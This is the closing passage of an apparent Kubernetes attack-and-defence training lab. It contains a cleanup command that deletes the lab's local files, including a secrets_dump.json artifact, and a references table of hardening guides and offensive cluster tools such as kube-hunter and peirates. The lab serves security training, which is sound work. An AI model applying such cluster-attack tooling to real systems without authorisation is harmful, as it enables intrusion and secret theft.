# Remove any local files
$ rm -f kind-config.yaml cosign.key cosign.pub secrets_dump.json novaplatform-openapi.json
References¶
| Resource | URL |
|---|---|
| MITRE ATT&CK Containers Matrix | https://attack.mitre.org/matrices/enterprise/containers/ |
| Kubernetes Security Documentation | https://kubernetes.io/docs/concepts/security/ |
| CIS Kubernetes Benchmark | https://www.cisecurity.org/benchmark/kubernetes |
| Falco Rules Repository | https://github.com/falcosecurity/rules |
| kube-hunter | https://github.com/aquasecurity/kube-hunter |
| peirates | https://github.com/inguardians/peirates |
| Trivy | https://github.com/aquasecurity/trivy |
| Istio Security Best Practices | https://istio.io/latest/docs/ops/best-practices/security/ |
| Cosign / Sigstore | https://github.com/sigstore/cosign |
| Kubernetes RBAC Good Practices | https://kubernetes.io/docs/concepts/security/rbac-good-practices/ |
| etcd Encryption at Rest | https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/ |
| NSA/CISA Kubernetes Hardening Guide | https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF |
Lab 26 is part of the Nexus SecOps Labs series. Complete Lab 13 (Cloud Red Team) first for foundational cloud attack knowledge before attempting this lab.